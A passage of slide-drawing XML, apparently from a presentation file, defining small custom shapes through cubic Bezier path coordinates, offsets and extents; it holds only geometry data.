                    <a:pt x="417" y="237"/>
                    <a:pt x="417" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="409" y="290"/>
                    <a:pt x="400" y="305"/>
                    <a:pt x="391" y="318"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="391" y="318"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="320"/>
                    <a:pt x="385" y="325"/>
                    <a:pt x="383" y="331"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="383" y="331"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="365"/>
                    <a:pt x="336" y="388"/>
                    <a:pt x="312" y="412"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="413"/>
                    <a:pt x="312" y="414"/>
                    <a:pt x="312" y="415"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="312" y="415"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="422"/>
                    <a:pt x="278" y="424"/>
                    <a:pt x="260" y="424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="424"/>
                    <a:pt x="171" y="407"/>
                    <a:pt x="139" y="376"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="273"/>
                    <a:pt x="103" y="167"/>
                    <a:pt x="173" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="78"/>
                    <a:pt x="232" y="69"/>
                    <a:pt x="256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39" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="134"/>
                    <a:pt x="1" y="306"/>
                    <a:pt x="103" y="412"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="465"/>
                    <a:pt x="189" y="488"/>
                    <a:pt x="233" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="488"/>
                    <a:pt x="293" y="477"/>
                    <a:pt x="320" y="459"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="320" y="459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="460"/>
                    <a:pt x="323" y="460"/>
                    <a:pt x="324" y="460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="460"/>
                    <a:pt x="337" y="456"/>
                    <a:pt x="348" y="445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="412"/>
                    <a:pt x="487" y="237"/>
                    <a:pt x="451" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="58"/>
                    <a:pt x="314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3465300" y="1177425"/>
              <a:ext cx="13000" cy="12125"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="485" w="520">
                  <a:moveTo>
                    <a:pt x="284" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="73"/>
                    <a:pt x="390" y="104"/>
                    <a:pt x="417" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="450" y="191"/>
                    <a:pt x="450" y="225"/>
                    <a:pt x="450" y="294"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="430" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430" y="315"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="428" y="315"/>
                    <a:pt x="427" y="314"/>
                    <a:pt x="426" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="421" y="314"/>
                    <a:pt x="417" y="318"/>
                    <a:pt x="417" y="329"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="417" y="329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347" y="400"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="406"/>
                    <a:pt x="337" y="411"/>
                    <a:pt x="335" y="417"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="335" y="417"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="424"/>
                    <a:pt x="301" y="427"/>
                    <a:pt x="284" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="427"/>
                    <a:pt x="201" y="408"/>
                    <a:pt x="172" y="364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="294"/>
                    <a:pt x="139" y="155"/>
                    <a:pt x="208" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="77"/>
                    <a:pt x="261" y="73"/>
                    <a:pt x="284" y="73"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="0"/>
                    <a:pt x="209" y="16"/>
                    <a:pt x="172" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="122"/>
                    <a:pt x="0" y="294"/>
                    <a:pt x="139" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="469"/>
                    <a:pt x="212" y="484"/>
                    <a:pt x="251" y="484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="484"/>
                    <a:pt x="315" y="474"/>
                    <a:pt x="344" y="455"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="344" y="455"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="464"/>
                    <a:pt x="367" y="469"/>
                    <a:pt x="381" y="469"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="520" y="433"/>
                    <a:pt x="520" y="225"/>
                    <a:pt x="486" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="441" y="53"/>
                    <a:pt x="367" y="0"/>
                    <a:pt x="291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3586875" y="511650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7"/>
                    <a:pt x="417" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="451" y="212"/>
                    <a:pt x="451" y="245"/>
                    <a:pt x="417" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="302"/>
                    <a:pt x="414" y="320"/>
                    <a:pt x="409" y="335"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="409" y="335"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="390"/>
                    <a:pt x="322" y="421"/>
                    <a:pt x="266" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="421"/>
                    <a:pt x="198" y="409"/>
                    <a:pt x="173" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="281"/>
                    <a:pt x="140" y="142"/>
                    <a:pt x="209" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="86"/>
                    <a:pt x="253" y="77"/>
                    <a:pt x="276" y="77"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="292" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="1"/>
                    <a:pt x="210" y="12"/>
                    <a:pt x="173" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="142"/>
                    <a:pt x="1" y="315"/>
                    <a:pt x="140" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="456"/>
                    <a:pt x="215" y="471"/>
                    <a:pt x="255" y="471"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="471"/>
                    <a:pt x="315" y="463"/>
                    <a:pt x="343" y="448"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="343" y="448"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="451"/>
                    <a:pt x="348" y="454"/>
                    <a:pt x="348" y="454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="520" y="420"/>
                    <a:pt x="520" y="245"/>
                    <a:pt x="487" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="442" y="40"/>
                    <a:pt x="368" y="1"/>
                    <a:pt x="29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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2814750" y="337125"/>
              <a:ext cx="8725" cy="8700"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="348" w="349">
                  <a:moveTo>
                    <a:pt x="176" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="0"/>
                    <a:pt x="1" y="70"/>
                    <a:pt x="1" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="278"/>
                    <a:pt x="106" y="348"/>
                    <a:pt x="176" y="348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="348"/>
                    <a:pt x="348" y="278"/>
                    <a:pt x="348" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="70"/>
                    <a:pt x="279" y="0"/>
                    <a:pt x="17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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2886875" y="274600"/>
              <a:ext cx="16500" cy="16550"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="662" w="660">
                  <a:moveTo>
                    <a:pt x="348" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="0"/>
                    <a:pt x="0" y="139"/>
                    <a:pt x="0" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="523"/>
                    <a:pt x="173" y="662"/>
                    <a:pt x="348" y="662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="520" y="662"/>
                    <a:pt x="659" y="523"/>
                    <a:pt x="659" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="659" y="139"/>
                    <a:pt x="520" y="0"/>
                    <a:pt x="34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2814750" y="360550"/>
              <a:ext cx="13100" cy="11775"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="471" w="524">
                  <a:moveTo>
                    <a:pt x="270" y="77"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="77"/>
                    <a:pt x="368" y="126"/>
                    <a:pt x="417" y="175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="417" y="281"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="308"/>
                    <a:pt x="407" y="329"/>
                    <a:pt x="392" y="347"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="392" y="347"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="394"/>
                    <a:pt x="303" y="420"/>
                    <a:pt x="250" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="420"/>
                    <a:pt x="177" y="408"/>
                    <a:pt x="140" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="281"/>
                    <a:pt x="106" y="142"/>
                    <a:pt x="209" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="85"/>
                    <a:pt x="250" y="77"/>
                    <a:pt x="270" y="77"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="259" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="0"/>
                    <a:pt x="177" y="12"/>
                    <a:pt x="140" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="142"/>
                    <a:pt x="1" y="314"/>
                    <a:pt x="106" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="455"/>
                    <a:pt x="203" y="470"/>
                    <a:pt x="246" y="470"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="470"/>
                    <a:pt x="307" y="463"/>
                    <a:pt x="332" y="449"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="332" y="449"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="452"/>
                    <a:pt x="341" y="453"/>
                    <a:pt x="348" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="420"/>
                    <a:pt x="523" y="244"/>
                    <a:pt x="454" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="409" y="39"/>
                    <a:pt x="334" y="0"/>
                    <a:pt x="25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3173475" y="406600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3" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="1"/>
                    <a:pt x="0" y="37"/>
                    <a:pt x="0" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="139"/>
                    <a:pt x="70" y="209"/>
                    <a:pt x="103" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="209"/>
                    <a:pt x="209" y="139"/>
                    <a:pt x="209" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="37"/>
                    <a:pt x="173" y="1"/>
                    <a:pt x="103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3332375" y="290225"/>
              <a:ext cx="5225" cy="5225"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="209" w="209">
                  <a:moveTo>
                    <a:pt x="106" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="0"/>
                    <a:pt x="0" y="37"/>
                    <a:pt x="0" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="139"/>
                    <a:pt x="70" y="209"/>
                    <a:pt x="106" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="209"/>
                    <a:pt x="209" y="139"/>
                    <a:pt x="209" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="37"/>
                    <a:pt x="176" y="0"/>
                    <a:pt x="10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3252475" y="410075"/>
              <a:ext cx="7875" cy="8700"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="348" w="315">
                  <a:moveTo>
                    <a:pt x="139" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="0"/>
                    <a:pt x="0" y="70"/>
                    <a:pt x="0" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="245"/>
                    <a:pt x="70" y="348"/>
                    <a:pt x="139" y="348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="348"/>
                    <a:pt x="314" y="245"/>
                    <a:pt x="314" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="70"/>
                    <a:pt x="245" y="0"/>
                    <a:pt x="139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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3174300" y="291125"/>
              <a:ext cx="8725" cy="7800"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="312" w="349">
                  <a:moveTo>
                    <a:pt x="176" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="1"/>
                    <a:pt x="1" y="70"/>
                    <a:pt x="1" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="242"/>
                    <a:pt x="106" y="312"/>
                    <a:pt x="176" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="312"/>
                    <a:pt x="348" y="242"/>
                    <a:pt x="348" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="70"/>
                    <a:pt x="279" y="1"/>
                    <a:pt x="176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3251650" y="433500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51" y="62"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="62"/>
                    <a:pt x="388" y="119"/>
                    <a:pt x="417" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="211"/>
                    <a:pt x="450" y="245"/>
                    <a:pt x="417" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="302"/>
                    <a:pt x="414" y="319"/>
                    <a:pt x="408" y="335"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="408" y="335"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="390"/>
                    <a:pt x="321" y="420"/>
                    <a:pt x="265" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="420"/>
                    <a:pt x="197" y="408"/>
                    <a:pt x="172" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="281"/>
                    <a:pt x="139" y="142"/>
                    <a:pt x="209" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="65"/>
                    <a:pt x="236" y="62"/>
                    <a:pt x="251" y="62"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="290" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="0"/>
                    <a:pt x="210" y="12"/>
                    <a:pt x="172" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="142"/>
                    <a:pt x="0" y="314"/>
                    <a:pt x="139" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="455"/>
                    <a:pt x="215" y="470"/>
                    <a:pt x="255" y="470"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="470"/>
                    <a:pt x="314" y="462"/>
                    <a:pt x="342" y="448"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="342" y="448"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="451"/>
                    <a:pt x="347" y="453"/>
                    <a:pt x="347" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="520" y="420"/>
                    <a:pt x="520" y="245"/>
                    <a:pt x="450" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="39"/>
                    <a:pt x="363" y="0"/>
                    <a:pt x="290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3001525" y="238075"/>
              <a:ext cx="13000" cy="11775"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="471" w="520">
                  <a:moveTo>
                    <a:pt x="245" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="63"/>
                    <a:pt x="353" y="120"/>
                    <a:pt x="381" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="210"/>
                    <a:pt x="417" y="247"/>
                    <a:pt x="417" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="409" y="295"/>
                    <a:pt x="402" y="306"/>
                    <a:pt x="394" y="316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="381" y="316"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="377" y="327"/>
                    <a:pt x="372" y="338"/>
                    <a:pt x="366" y="347"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="366" y="347"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="358"/>
                    <a:pt x="344" y="369"/>
                    <a:pt x="333" y="384"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="333" y="384"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="309" y="403"/>
                    <a:pt x="280" y="413"/>
                    <a:pt x="250" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="413"/>
                    <a:pt x="168" y="394"/>
                    <a:pt x="139" y="349"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="280"/>
                    <a:pt x="103" y="141"/>
                    <a:pt x="208" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="66"/>
                    <a:pt x="233" y="63"/>
                    <a:pt x="245" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="258" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="0"/>
                    <a:pt x="176" y="12"/>
                    <a:pt x="139" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="141"/>
                    <a:pt x="0" y="316"/>
                    <a:pt x="103" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="454"/>
                    <a:pt x="177" y="470"/>
                    <a:pt x="217" y="470"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="470"/>
                    <a:pt x="285" y="458"/>
                    <a:pt x="316" y="437"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="316" y="437"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="446"/>
                    <a:pt x="329" y="455"/>
                    <a:pt x="347" y="455"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="486" y="419"/>
                    <a:pt x="520" y="210"/>
                    <a:pt x="450" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="40"/>
                    <a:pt x="332" y="0"/>
                    <a:pt x="258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3329800" y="871425"/>
              <a:ext cx="13025" cy="11975"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="479" w="521">
                  <a:moveTo>
                    <a:pt x="276" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="69"/>
                    <a:pt x="392" y="118"/>
                    <a:pt x="418" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="451" y="203"/>
                    <a:pt x="451" y="236"/>
                    <a:pt x="418" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="418" y="329"/>
                    <a:pt x="393" y="362"/>
                    <a:pt x="366" y="392"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="366" y="392"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="412"/>
                    <a:pt x="312" y="421"/>
                    <a:pt x="283" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="421"/>
                    <a:pt x="202" y="404"/>
                    <a:pt x="173" y="375"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="273"/>
                    <a:pt x="140" y="134"/>
                    <a:pt x="209" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="77"/>
                    <a:pt x="253" y="69"/>
                    <a:pt x="276" y="69"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="267" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="0"/>
                    <a:pt x="202" y="9"/>
                    <a:pt x="173" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="134"/>
                    <a:pt x="1" y="306"/>
                    <a:pt x="140" y="412"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="459"/>
                    <a:pt x="215" y="478"/>
                    <a:pt x="254" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="478"/>
                    <a:pt x="321" y="465"/>
                    <a:pt x="351" y="444"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="351" y="444"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="520" y="409"/>
                    <a:pt x="520" y="236"/>
                    <a:pt x="487" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="5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3656350" y="710775"/>
              <a:ext cx="13025" cy="12150"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="486" w="521">
                  <a:moveTo>
                    <a:pt x="269" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="69"/>
                    <a:pt x="358" y="118"/>
                    <a:pt x="382" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="418" y="201"/>
                    <a:pt x="418" y="237"/>
                    <a:pt x="418" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="418" y="340"/>
                    <a:pt x="348" y="376"/>
                    <a:pt x="312" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="417"/>
                    <a:pt x="312" y="424"/>
                    <a:pt x="312" y="430"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="312" y="430"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="436"/>
                    <a:pt x="283" y="438"/>
                    <a:pt x="267" y="438"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="438"/>
                    <a:pt x="183" y="419"/>
                    <a:pt x="140" y="376"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="306"/>
                    <a:pt x="104" y="167"/>
                    <a:pt x="209" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="78"/>
                    <a:pt x="250" y="69"/>
                    <a:pt x="269" y="69"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="232" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="1"/>
                    <a:pt x="168" y="9"/>
                    <a:pt x="140" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="131"/>
                    <a:pt x="1" y="306"/>
                    <a:pt x="104" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="462"/>
                    <a:pt x="189" y="485"/>
                    <a:pt x="233" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="485"/>
                    <a:pt x="292" y="475"/>
                    <a:pt x="319" y="457"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="319" y="457"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="458"/>
                    <a:pt x="323" y="459"/>
                    <a:pt x="325" y="459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="459"/>
                    <a:pt x="338" y="455"/>
                    <a:pt x="348" y="445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="445"/>
                    <a:pt x="520" y="237"/>
                    <a:pt x="451" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="57"/>
                    <a:pt x="315" y="1"/>
                    <a:pt x="232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3354950" y="914000"/>
              <a:ext cx="12200" cy="12150"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="486" w="488">
                  <a:moveTo>
                    <a:pt x="258" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="69"/>
                    <a:pt x="359" y="118"/>
                    <a:pt x="384" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="418" y="201"/>
                    <a:pt x="418" y="237"/>
                    <a:pt x="418" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="285"/>
                    <a:pt x="404" y="297"/>
                    <a:pt x="397" y="309"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="397" y="309"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="307"/>
                    <a:pt x="384" y="307"/>
                    <a:pt x="384" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="326"/>
                    <a:pt x="372" y="342"/>
                    <a:pt x="364" y="356"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="364" y="356"/>
                  </a:lnTo>
